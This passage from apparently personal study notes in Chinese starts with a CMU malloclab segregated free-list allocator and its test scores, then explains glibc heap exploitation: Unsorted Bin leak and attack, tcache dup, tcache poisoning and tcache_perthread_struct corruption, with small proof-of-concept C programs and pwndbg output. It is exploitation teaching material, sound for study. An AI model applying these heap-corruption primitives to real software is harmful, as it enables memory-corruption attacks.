if((csize-asize)>=(2*DSIZE)) // 切割
{
PUT(HDRP(bp),PACK(asize,1)); // 重置头部
PUT(FTRP(bp),PACK(asize,1)); // 重置脚部
bp = NEXT_BLKP(bp);

PUT(HDRP(bp),PACK(csize-asize,0)); // 初始化头部
PUT(FTRP(bp),PACK(csize-asize,0)); // 初始化脚部
PUT(NEXT_LINKNODE_RP(bp),0); // 初始化后继
PUT(PREV_LINKNODE_RP(bp),0); // 初始化前继
coalesce(bp);
}
else // 刚好合适
{
PUT(HDRP(bp),PACK(csize,1));
PUT(FTRP(bp),PACK(csize,1));
}
}
  • Find_fit 的逻辑:首先根据size获取相应的空间链表,遍历当前链表所以的空闲块,如果没有合适的空闲块就“root+=WSIZE”,在有更大空闲块的空间链表中寻找,获取合适的空间链表后,先获取该链表中最前面的那个空闲块,再从前往后进行遍历
  • Place的逻辑:在判断是否切割前先脱链,接着完成后续操作

这里引入了两个对空间链表进行操作的函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
inline char *find_list_root(size_t size)
{
int i = 0;
if(size<=8) i=0;
else if(size<=16) i= 1;
else if(size<=32) i= 2;
else if(size<=64) i= 3;
else if(size<=128) i= 4;
else if(size<=256) i= 5;
else if(size<=512) i= 6;
else if(size<=2048) i= 7;
else if(size<=4096) i= 8;
else i= 9;
/*find the index of bin which will put this block */
return block_list_start+(i*WSIZE);
}

根据“size”获取对应空间链表的位置,不多说

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
inline void fix_linklist(char *p)
{
char *root = find_list_root(GET_SIZE(HDRP(p)));
char *prevp = GET(PREV_LINKNODE_RP(p));
char *nextp = GET(NEXT_LINKNODE_RP(p));

if(prevp == NULL)
{
if(nextp != NULL)PUT(PREV_LINKNODE_RP(nextp),0);
PUT(root,nextp);
}
else
{
if(nextp != NULL)PUT(PREV_LINKNODE_RP(nextp),prevp);
PUT(NEXT_LINKNODE_RP(prevp),nextp);
}
PUT(NEXT_LINKNODE_RP(p),NULL);
PUT(PREV_LINKNODE_RP(p),NULL);
}

脱链操作,跟第三次实验中的“__remove”功能类似

“mm_free”的变化不大,主要是“coalesce”变化较大:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
static void *coalesce(void *bp)
{
size_t prev_alloc = GET_ALLOC(FTRP(PREV_BLKP(bp)));
size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
size_t size = GET_SIZE(HDRP(bp));

if(prev_alloc && next_alloc)
{
insert_to_list(bp); // 插入对应空间链表的头部
return bp;
}
if(prev_alloc && !next_alloc)
{
size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
fix_linklist(NEXT_BLKP(bp)); // 把下一个空闲块脱链
PUT(HDRP(bp), PACK(size,0));
PUT(FTRP(bp), PACK(size,0));
}
else if(!prev_alloc && next_alloc)
{
size += GET_SIZE(HDRP(PREV_BLKP(bp)));
fix_linklist(PREV_BLKP(bp)); // 把上一个空闲块脱链
PUT(FTRP(bp),PACK(size,0));
PUT(HDRP(PREV_BLKP(bp)),PACK(size,0));
bp = PREV_BLKP(bp);
}
else
{
size +=GET_SIZE(FTRP(NEXT_BLKP(bp)))+ GET_SIZE(HDRP(PREV_BLKP(bp)));
fix_linklist(PREV_BLKP(bp)); // 把上一个空闲块脱链
fix_linklist(NEXT_BLKP(bp)); // 把下一个空闲块脱链
PUT(FTRP(NEXT_BLKP(bp)),PACK(size,0));
PUT(HDRP(PREV_BLKP(bp)),PACK(size,0));
bp = PREV_BLKP(bp);
}
insert_to_list(bp); // 插入对应空间链表的头部
return bp;
}

在合并之后,需要把被合并的空闲块脱链,最后新的空闲块插入对应的空间链表中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
inline void insert_to_list(char *p)
{
char *root = find_list_root(GET_SIZE(HDRP(p)));
char *prevp = root; // 获取root的地址
char *nextp = GET(root); // 获取root指向的那个空闲块(可能为NULL)

while(nextp!=NULL) // 优化操作,写上可以增加1分
{
if(GET_SIZE(HDRP(nextp))>=GET_SIZE(HDRP(p)))
break;
prevp = nextp;
nextp = GET(NEXT_LINKNODE_RP(nextp));
}
if(prevp == root) // 插入该空间链表的头部(没有进行优化操作)
{
PUT(root,p); /* PUT(prevp,p); */
PUT(NEXT_LINKNODE_RP(p),nextp);
PUT(PREV_LINKNODE_RP(p),NULL);
if(nextp!=NULL) // 根据优化操作进行调整
PUT(PREV_LINKNODE_RP(nextp),p);
}
else // 插入该空间链表的中段(受优化操作影响)
{
PUT(NEXT_LINKNODE_RP(prevp),p);
PUT(PREV_LINKNODE_RP(p),prevp);
PUT(NEXT_LINKNODE_RP(p),nextp);
if(nextp!=NULL)
PUT(PREV_LINKNODE_RP(nextp),p);
}
}

基本逻辑:

一,先获取当前空间链表,进行优化操作:

  • 在同一个空间链表中,空闲块的大小也是有差异的,该优化操作会获取“root指向的那个空闲块”(第一个空闲块)比较改空闲块的大小,如果不符合条件,程序就会把“下一个空闲块”当做“root”继续进行后续操作(相当于把“root”和“第一个空闲块”向后“平移”了1个单位),这样操作保证了:小内存块在前,大内存块在后

二,后续操作要分情况进行:

  • 插入该空间链表的头部:在“root”中写入指向它前驱的指针,在它的前驱中写入NULL,后继中写入第一个内存块的地址,最后调整第一个内存块的前驱指针
  • 插入该空间链表的中段:在“prevp”的后继中写入它自己的指针,在它的前驱中写入“prevp”,后继中写入“nextp”,最后调整“nextp”(第一个内存块)的前驱指针

1645520942860

整体逻辑:

结合“find_fit”来看,本程序才用了 半个LIFO队列 (后入先出,但又不完全是)

  • 获取空闲块时:从前往后进行遍历
  • 插入空闲块时:尽可能插入头部

这种对内存块进行大小排序,优先获取小内存块的做法的确提高了效率(指多打了1分)

打分&完整代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/*  分离式空闲链表+首次适配 */
➜ [/home/ywhkkx/malloclab-handout] ./mdriver -v
Team Name:ateam
Member 1 :Harry Bovik:bovik@cs.cmu.edu
Using default tracefiles in /home/ywhkkx/malloclab-handout/traces/
Measuring performance with gettimeofday().

Results for mm malloc:
trace valid util ops secs Kops
0 yes 99% 5694 0.000104 54645
1 yes 99% 5848 0.000097 60538
2 yes 99% 6648 0.000271 24559
3 yes 100% 5380 0.000103 52182
4 yes 99% 14400 0.000096150000
5 yes 95% 4800 0.001038 4624
6 yes 95% 4800 0.000852 5636
7 yes 55% 12000 0.000177 67912
8 yes 51% 24000 0.000557 43103
9 yes 22% 14401 0.042128 342
10 yes 30% 14401 0.002138 6737
Total 77% 112372 0.047560 2363

Perf index = 46 (util) + 40 (thru) = 86/100
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <unistd.h>
#include <string.h>

#include "mm.h"
#include "memlib.h"

/* single word (4) or double word (8) alignment */
#define ALIGNMENT 8

/* rounds up to the nearest multiple of ALIGNMENT */
#define ALIGN(size) (((size) + (ALIGNMENT-1)) & ~0x7)

#define SIZE_T_SIZE (ALIGN(sizeof(size_t)))

#define WSIZE 4
#define DSIZE 8
#define CHUNKSIZE (1<<12)
#define MAX(x,y) ((x) > (y)? (x) : (y))
#define PREALLOC(x) ((!x) ? 0 : 2)
#define PACK(size,alloc) ((size) | (alloc))
#define GET(p) (*(unsigned int *)(p))
#define PUT(p,val) (*(unsigned int *)(p) = (val))
#define GET_SIZE(p) (GET(p) & ~0x7)
#define GET_ALLOC(p) (GET(p) & 0x1)
#define GET_PREALLOC(p) (GET(p) & 0x2)
#define HDRP(bp) ((char *)(bp) - WSIZE)
#define FTRP(bp) ((char *)(bp) + GET_SIZE(HDRP(bp)) - DSIZE)
#define PREV_LINKNODE_RP(bp) ((char*)(bp))
#define NEXT_LINKNODE_RP(bp) ((char*)(bp)+WSIZE)
#define NEXT_BLKP(bp) ((char*)(bp) + GET_SIZE(((char *)(bp) - WSIZE)))
#define PREV_BLKP(bp) ((char*)(bp) - GET_SIZE(((char *)(bp) - DSIZE)))


static void* extend_heap(size_t words);
static void* coalesce(void* bp);
static void* find_fit(size_t asize);
static void place(void* bp, size_t asize);
void insert_to_list(char* p);
void fix_linklist(char* p);
inline char* find_list_root(size_t size);
static char* heap_listp = NULL;
static char* block_list_start = NULL;

/*
* mm_init - initialize the malloc package.
*/

int mm_init(void)
{
if ((heap_listp = mem_sbrk(14 * WSIZE)) == (void*)-1)
return -1;
PUT(heap_listp, 0);
PUT(heap_listp + (1 * WSIZE), 0);
PUT(heap_listp + (2 * WSIZE), 0);
PUT(heap_listp + (3 * WSIZE), 0);
PUT(heap_listp + (4 * WSIZE), 0);
PUT(heap_listp + (5 * WSIZE), 0);
PUT(heap_listp + (6 * WSIZE), 0);
PUT(heap_listp + (7 * WSIZE), 0);
PUT(heap_listp + (8 * WSIZE), 0);
PUT(heap_listp + (9 * WSIZE), 0);
PUT(heap_listp + (10 * WSIZE), 0);
PUT(heap_listp + (11 * WSIZE), PACK(DSIZE, 1));
PUT(heap_listp + (12 * WSIZE), PACK(DSIZE, 1));
PUT(heap_listp + (13 * WSIZE), PACK(0, 1));

block_list_start = heap_listp;
heap_listp += (12 * WSIZE);

if ((extend_heap(CHUNKSIZE / DSIZE)) == NULL)
return -1;
return 0;
}

static void* extend_heap(size_t dwords)
{
char* bp;
size_t size;

size = (dwords % 2) ? (dwords + 1) * DSIZE : dwords * DSIZE;

if ((long)(bp = mem_sbrk(size)) == (void*)-1)
return NULL;
PUT(HDRP(bp), PACK(size, 0));
PUT(FTRP(bp), PACK(size, 0));
PUT(PREV_LINKNODE_RP(bp), NULL);
PUT(NEXT_LINKNODE_RP(bp), NULL);

PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 1));

return coalesce(bp);
}

static void* coalesce(void* bp)
{
size_t prev_alloc = GET_ALLOC(FTRP(PREV_BLKP(bp)));
size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
size_t size = GET_SIZE(HDRP(bp));

/*coalesce the block and change the point*/
if (prev_alloc && next_alloc)
{
insert_to_list(bp);
return bp;
}
if (prev_alloc && !next_alloc)
{
size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
fix_linklist(NEXT_BLKP(bp));
PUT(HDRP(bp), PACK(size, 0));
PUT(FTRP(bp), PACK(size, 0));
}
else if (!prev_alloc && next_alloc)
{
size += GET_SIZE(HDRP(PREV_BLKP(bp)));
fix_linklist(PREV_BLKP(bp));
PUT(FTRP(bp), PACK(size, 0));
PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
bp = PREV_BLKP(bp);
}
else
{
size += GET_SIZE(FTRP(NEXT_BLKP(bp))) + GET_SIZE(HDRP(PREV_BLKP(bp)));
fix_linklist(PREV_BLKP(bp));
fix_linklist(NEXT_BLKP(bp));
PUT(FTRP(NEXT_BLKP(bp)), PACK(size, 0));
PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
bp = PREV_BLKP(bp);
}
insert_to_list(bp);
return bp;
}

/*
* mm_malloc - Allocate a block by incrementing the brk pointer.
* Always allocate a block whose size is a multiple of the alignment.
*/

void *mm_malloc(size_t size)
{
size_t asize;
size_t extendsize;
char *bp;
if (size <= 0)
return NULL;
if (size <= DSIZE)
asize = 2 * DSIZE;
else
asize = (DSIZE) * ((size + (DSIZE)+(DSIZE - 1)) / (DSIZE));
if ((bp = find_fit(asize)) != NULL)
{
place(bp, asize);
return bp;
}

extendsize = MAX(asize, CHUNKSIZE);
if ((bp = extend_heap(extendsize / DSIZE)) == NULL)
{
return NULL;
}
place(bp, asize);
return bp;
}

/*
* mm_free - Freeing a block does nothing.
*/

void mm_free(void* bp)
{
if (bp == 0)
return;
size_t size = GET_SIZE(HDRP(bp));

PUT(HDRP(bp), PACK(size, 0));
PUT(FTRP(bp), PACK(size, 0));
PUT(NEXT_LINKNODE_RP(bp), NULL);
PUT(PREV_LINKNODE_RP(bp), NULL);
coalesce(bp);
}

static void* find_fit(size_t size)
{
char* root = find_list_root(size);
for (root; root != (heap_listp - (2 * WSIZE)); root += WSIZE)
{
char* tmpP = GET(root);
while (tmpP != NULL)
{
if (GET_SIZE(HDRP(tmpP)) >= size)
return tmpP;
tmpP = GET(NEXT_LINKNODE_RP(tmpP));
}
}
return NULL;
}

static void place(void* bp, size_t asize)
{
size_t csize = GET_SIZE(HDRP(bp));
fix_linklist(bp);
if ((csize - asize) >= (2 * DSIZE))
{
PUT(HDRP(bp), PACK(asize, 1));
PUT(FTRP(bp), PACK(asize, 1));
bp = NEXT_BLKP(bp);

PUT(HDRP(bp), PACK((csize - asize), 0));
PUT(FTRP(bp), PACK((csize - asize), 0));
PUT(NEXT_LINKNODE_RP(bp), 0);
PUT(PREV_LINKNODE_RP(bp), 0);
coalesce(bp);
}
else
{
PUT(HDRP(bp), PACK(csize, 1));
PUT(FTRP(bp), PACK(csize, 1));
}
}

/*
* mm_realloc - Implemented simply in terms of mm_malloc and mm_free
*/

void* mm_realloc(void* ptr, size_t size)
{
size_t oldsize = GET_SIZE(HDRP(ptr));
void* newptr = mm_malloc(size);
if (!newptr)
return 0;
if (!ptr)
return newptr;
memcpy(newptr, ptr, (size < oldsize ? size : oldsize));
mm_free(ptr);
return newptr;
}

inline char* find_list_root(size_t size)
{
int i = 0;
if (size <= 8) i = 0;
else if (size <= 16) i = 1;
else if (size <= 32) i = 2;
else if (size <= 64) i = 3;
else if (size <= 128) i = 4;
else if (size <= 256) i = 5;
else if (size <= 512) i = 6;
else if (size <= 2048) i = 7;
else if (size <= 4096) i = 8;
else i = 9;
return block_list_start + (i * WSIZE);
}

inline void fix_linklist(char* p)
{
char* root = find_list_root(GET_SIZE(HDRP(p)));
char* prevp = GET(PREV_LINKNODE_RP(p));
char* nextp = GET(NEXT_LINKNODE_RP(p));

if (prevp == NULL)
{
if (nextp != NULL)PUT(PREV_LINKNODE_RP(nextp), 0);
PUT(root, nextp);
}
else
{
if (nextp != NULL)PUT(PREV_LINKNODE_RP(nextp), prevp);
PUT(NEXT_LINKNODE_RP(prevp), nextp);
}

PUT(NEXT_LINKNODE_RP(p), NULL);
PUT(PREV_LINKNODE_RP(p), NULL);
}

inline void insert_to_list(char* p)
{
char* root = find_list_root(GET_SIZE(HDRP(p)));
char* prevp = root;
char* nextp = GET(root);

while (nextp != NULL)
{
if (GET_SIZE(HDRP(nextp)) >= GET_SIZE(HDRP(p)))
break;
prevp = nextp;
nextp = GET(NEXT_LINKNODE_RP(nextp));
}
if (prevp == root)
{
PUT(root, p);
PUT(NEXT_LINKNODE_RP(p), nextp);
PUT(PREV_LINKNODE_RP(p), NULL);
if (nextp != NULL)
PUT(PREV_LINKNODE_RP(nextp), p);
}
else
{
PUT(NEXT_LINKNODE_RP(prevp), p);
PUT(PREV_LINKNODE_RP(p), prevp);
PUT(NEXT_LINKNODE_RP(p), nextp);
if (nextp != NULL)
PUT(PREV_LINKNODE_RP(nextp), p);
}
}

Ptmalloc算法:Unsortedbin Attack

Unsortedbin Attack,也是堆中较为常见的利用手段,可以用来 泄露地址WAA

概念:利用ptmalloc算法中,Unsortedbin的机制进行攻击


Unsorted Chunk

Unsorted Chunk就是暂时没有被程序处理的chunk

来源:

  • 当一个较大的chunk被分割成两半后,剩下的部分大于MINSIZE
  • 释放一个不属于fastbin的chunk,并且该chunk不和top chunk紧邻
  • 当进行malloc_consolidate时,合并后的chunk会优先成为Unsorted Chunk(不与top chunk相邻)

这些Unsorted Chunk会以双向链表的形式构成Unsorted Bin

Unsorted Bin

Unsorted Bin就是专门用于管理Unsorted Chunk的数据结构,可以存储不同大小的chunk,有且只有一条

使用:

  • 采用的遍历顺序是FIFO:先被释放的chunk,将会优先被申请( 先进先出队列)
  • 在程序 malloc 时,如果在 fastbin,small bin 中找不到对应大小的 chunk,就会尝试从 Unsorted Bin 中寻找 chunk,如果取出来的 chunk 大小刚好满足,就会直接返回给用户,否则就会把这些 chunk 分别插入到对应的 bin 中

Unsorted Bin Leak

原理:

低libc版本的Unsorted Bin有一个特点:

  • 第一个chunk的BK指针:指向“main_arena+xx”
  • 最后一个chunk的FD指针:指向“main_arena+xx”

而“main_arena+xx”距离“libc_base”的偏移是固定的,所以可以通过泄露“main_arena+xx”来计算“libc_base”

案例:

利用:

如果程序拥有“打印模块”和UAF漏洞,则可以直接打印该地址

除此之外,很难泄露“main_arena+xx”

Unsorted Bin Attack

原理:

当将一个 unsorted bin 取出的时候,会将 bck->fd 的位置写入本 Unsorted Chunk 的位置

1
2
3
4
5
/* remove from unsorted list */
if (__glibc_unlikely (bck->fd != victim))
malloc_printerr ("malloc(): corrupted unsorted chunks 3");
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

换而言之,如果我们控制了 bk 的值,我们就能将 unsorted_chunks (av) 写到任意地址

  • unsorted bin 也是以链表的方式进行组织的,和 fast bin 不同的是其分配方式是FIFO,即一个chunk放入unsorted bin链时将该堆块插入链表头,而从这个链取堆块的时候是从尾部开始的,因此unsorted bin遍历堆块的时候使用的是bk指针

通常 Unsorted Bin Attack 就是为了 Fastbin Attack 提供“\x7f”的

案例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <stdio.h>
#include <malloc.h>
#include <unistd.h>
#include <string.h>
int main()
{
int size=0x100;
char *p=malloc(size);
printf("%p\n",p); /* sleep函数为程序打断点使用,无其他作用 */
free(p);
sleep(0); //第一步

*(long*)(p+8)=0x601100; //0x601100是我们的攻击目标
sleep(0); //第二步

char *r=malloc(size);
printf("%p\n",r);
sleep(0); //第三步

return 0;
}

第一步:

chunkP是 Unsortedbin 中唯一的chunk

第二步:

chunkP的BK指针被改为“0x601100”

第三步:

chunkP被申请后,Unsortedbin 中没有chunk了,但是“0x601100”中被写入“main_arena+xx”

如果“0x601110-0x3”是我们的攻击目标的话,那么“0x601110-0x3”的指定偏移用于表示size的地址处就被我们写入了0x7f的数值

版本对Unsorted Bin Attack的影响

glibc2.23

1
2
3
4
5
6
7
8
9
10
11
12
13
14
for (;;)
{
int iters = 0;
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
{
bck = victim->bk;
if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
|| __builtin_expect (victim->size > av->system_mem, 0))
malloc_printerr (check_action, "malloc(): memory corruption",
chunk2mem (victim), av);
/* remove from unsorted list */
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);
}

只检查了“victim->size”,形同虚设,可以直接打Unsorted Bin Attack

glibc2.29

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
for (;;)
{
int iters = 0;
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
{
bck = victim->bk;
size = chunksize (victim);
mchunkptr next = chunk_at_offset (victim, size);

if (__glibc_unlikely (size <= 2 * SIZE_SZ)
|| __glibc_unlikely (size > av->system_mem))
malloc_printerr ("malloc(): invalid size (unsorted)");
if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
|| __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
malloc_printerr ("malloc(): invalid next size (unsorted)");
if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
if (__glibc_unlikely (bck->fd != victim)
|| __glibc_unlikely (victim->fd != unsorted_chunks (av)))
malloc_printerr ("malloc(): unsorted double linked list corrupted");
if (__glibc_unlikely (prev_inuse (next)))
malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);
}

直接把“victim的全家”都给检查了,基本上不能打Unsorted Bin Attack

其实也有办法打Unsorted Bin Attack,以后遇到再说

Ptmalloc算法:Tcache Attack

在 Glibc的2.26 中新增了Tcache机制,这是ptmalloc2的缓存机制

Tcache是 libc-2.26 之后引入的一种机制(类似于fastbin),而 Tcache Attack 则是针对 libc-2.26 及其后续版本的攻击

整体的攻击形式和fastbin类似


Tcache 源码

每条链上最多可以有7个chunk,free的时候优先放入tcache ,当tcache满了才放入fastbin,unsorted bin,malloc的时候优先去tcache找

Tcache使用两个新的数据结构,来管理Tcache中的bin:

1
2
3
4
5
6
7
8
9
10
11
12
typedef struct tcache_entry
{
struct tcache_entry *next;
} tcache_entry;

typedef struct tcache_perthread_struct
{
char counts[TCACHE_MAX_BINS]; // counts:记录对应Tcache的bin中现有的bin数量
tcache_entry *entries[TCACHE_MAX_BINS]; // entries(next):用来具体指向相应bin中的chunk块(相当于fastbin中的FD指针)
} tcache_perthread_struct;

static __thread tcache_perthread_struct *tcache = NULL;

Tcache使用以下代码,来进行初始化:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
static void
tcache_init(void)
{
mstate ar_ptr;
void *victim = 0;
const size_t bytes = sizeof (tcache_perthread_struct); //获得malloc需要的字节数

if (tcache_shutting_down)
return;

arena_get (ar_ptr, bytes);
victim = _int_malloc (ar_ptr, bytes); //使用malloc为该结构分配内存
if (!victim && ar_ptr != NULL)
{
ar_ptr = arena_get_retry (ar_ptr, bytes);
victim = _int_malloc (ar_ptr, bytes);
}

if (ar_ptr != NULL)
__libc_lock_unlock (ar_ptr->mutex);

if (victim)
{
tcache = (tcache_perthread_struct *) victim; //存放
memset (tcache, 0, sizeof (tcache_perthread_struct)); //清零
}
}

Tcache使用以下代码,来获取chunk:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
  // 从 tcache list 中获取内存
if (tc_idx < mp_.tcache_bins // 由 size 计算的 idx 在合法范围内
/*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
&& tcache
&& tcache->entries[tc_idx] != NULL) // 该条 tcache 链不为空
{
return tcache_get (tc_idx);
}
DIAG_POP_NEEDS_COMMENT;
#endif
// 进入与无 tcache 时类似的流程
if (SINGLE_THREAD_P)
{
victim = _int_malloc (&main_arena, bytes);
assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
&main_arena == arena_for_chunk (mem2chunk (victim)));
return victim;
}

tcache_get:

1
2
3
4
5
6
7
8
9
10
11
12
/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
assert (tc_idx < TCACHE_MAX_BINS);
assert (tcache->entries[tc_idx] > 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]); // 获得一个 chunk,counts 减一
return (void *) e;
}

Tcache使用以下代码,把chunk送入Tcache bin:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
......
......
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache
&& tc_idx < mp_.tcache_bins // 64
&& tcache->counts[tc_idx] < mp_.tcache_count) // 7
{
tcache_put (p, tc_idx);
return;
}
}
#endif
......
......

tcache_put:(缺少检查,造成了一种类似于 Double free 的攻击技术:tcache dup)

1
2
3
4
5
6
7
8
9
10
/* 按照size对应的idx将已释放块挂进tcache bins链表中 */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
e->next = tcache->entries[tc_idx]; /* 将被释放块的malloc指针交给next成员变量 */
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}

Tcache使用以下代码,把chunk从Tcache bin中释放:

1
2
3
4
5
6
7
8
9
10
11
12
13
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);

if (tcache
&& tc_idx < mp_.tcache_bins
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
#endif

Tcache 结构

类比:Tcachebin and Fastbin

  • fastbin chunk,smallbin chunk,unsortedbin chunk,这些 chunk 的FD指针都指向 nextchunk 的头,所以GDB中打印这些链表的时候,会显示各个chunk的首地址
  • tcachebin 的 next 指针与FD有所不同,它永远指向 nextchunk->next ,所以GDB中打印 tcachebin 的时候,会显示各个chunk的数据区

记住这一点,在劫持 tcache_perthread_struct->tcache_entry 的时候会省不少事

Tcache 顺序

内存释放

  • 在 free 函数的最先处理部分,首先是检查释放块是否页对齐及前后堆块的释放情况,便优先放入 tcache 结构中

内存申请

  • 申请的内存块符合 fastbin 大小时并且在 fastbin 内找到可用的空闲块时,会把该 fastbin 链上的其他内存块放入 tcache 中
  • 申请的内存块符合 smallbin 大小时并且在 smallbin 内找到可用的空闲块时,会把该 smallbin 链上的其他内存块放入 tcache 中
  • 当在 unsorted bin 链上循环处理时,当找到大小合适的链时,并不直接返回,而是先放到 tcache 中,继续处理
  • Tcachebin中的chunk不会分割

Tcache 利用

tcache leak

通常有两种leak:

  • unsortedbin leak 可以泄露“libc_base”
  • fastbin leak 可以泄露“heap_addr”

但是在 libc-2.27 出现 tcache 以后,释放的 chunk 先放入 tcachebin ,申请时也先从 tcache 中申请,为了把 free chunk 放入 unsortedbin 或者 fastbin(为了打上面这两种 leak),我们必须先把 tcachebin 填充满

tcache dup

类似于 Double free(上文已经提及过它的原理)

1
2
3
4
5
6
7
8
9
10
int main(){

unsigned long* chunk=malloc(0x20);

free(chunk);
memset(chunk,0,0x20); // 高libc版本的程序会检查BK指针是否为NULL,所以提前置空
free(chunk);

return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
Free chunk (tcache) | PREV_INUSE
Addr: 0x555555559290
Size: 0x31
fd: 0x00

pwndbg> telescope 0x555555559290
00:0000│ 0x555555559290 ◂— 0x0
01:0008│ 0x555555559298 ◂— 0x31 /* '1' */
02:0010│ rsi 0x5555555592a0 ◂— 0x0
03:0018│ 0x5555555592a8 —▸ 0x555555559010 ◂— 0x10000 /* 这个后面马上讲 */
/* 第一个tcache的BK:永远指向tcache_perthread_struct+0x10(count的位置) */
/* 这里也可以把tcache_perthread_struct当成一个chunk,第一个chunk永远指向它的next */
04:0020│ 0x5555555592b0 ◂— 0x0

tcache poisoning

可以把它理解为 tcache 版本的 fastbin attack,这里的 next 指针其实相当于 fastbin 下的FD指针,而且没有很多的检查,将已经在 tcachebin 中的 chunk 的FD改写到目的地址,就可以malloc合适的size得到控制权

  • 如果有修改模块直接写
  • 没有修改模块可以用 Double free,tcache dup 重复申请
  • 还可以用 unlink 实现 overlap 来写入目标地址

tcache perthread corruption

我们已经知道 tcache_perthread_struct 是整个 tcache 的管理结构,如果能控制这个结构体,那么无论我们 malloc 的 size 是多少,地址都是可控的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
int main(){

unsigned long* chunk1=malloc(0x10);
unsigned long* chunk2=malloc(0x10);
unsigned long* chunk3=malloc(0x10);
unsigned long* chunk4=malloc(0x40);
unsigned long* chunk5=malloc(0x50);
unsigned long* chunk6=malloc(0x60);

free(chunk1);
free(chunk2);
free(chunk3);
free(chunk4);
free(chunk5);
free(chunk6);

return 0;
}

GDB调试开启 tcache 的程序时,第一个chunk块就是 tcache_perthread_struct:

1
2
3
4
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x555555559000
Size: 0x291

我们可以看一下它的内容:

1
2
3
4
5
6
7
8
9
10
11
pwndbg> x/20xg 0x555555559000
0x555555559000: 0x0000000000000000 0x0000000000000291
0x555555559010: 0x0000000000000000 0x0000000000000000 // count
0x555555559020: 0x0000000000000000 0x0000000000000000
0x555555559030: 0x0000000000000000 0x0000000000000000
0x555555559040: 0x0000000000000000 0x0000000000000000
0x555555559050: 0x0000000000000000 0x0000000000000000
0x555555559060: 0x0000000000000000 0x0000000000000000
0x555555559070: 0x0000000000000000 0x0000000000000000
0x555555559080: 0x0000000000000000 0x0000000000000000
0x555555559090: 0x0000000000000000 0x0000000000000000 // tcache_entry
  • tcache_perthread_struct->count ,每两字节对应相应大小 Tcachebin 中的chunk个数
  • tcache_perthread_struct->tcache_entry ,每一个指针对应相应大小 Tcachebin 中第一个堆块的入口地址(指向tcache->next)

程序执行完毕后:

1
2
3
4
5
6
7
8
9
10
11
12
13
pwndbg> x/20xg 0x555555559000
0x555555559000: 0x0000000000000000 0x0000000000000291
0x555555559010: 0x0001000000000003 0x0000000000010001 // count
0x555555559020: 0x0000000000000000 0x0000000000000000
0x555555559030: 0x0000000000000000 0x0000000000000000
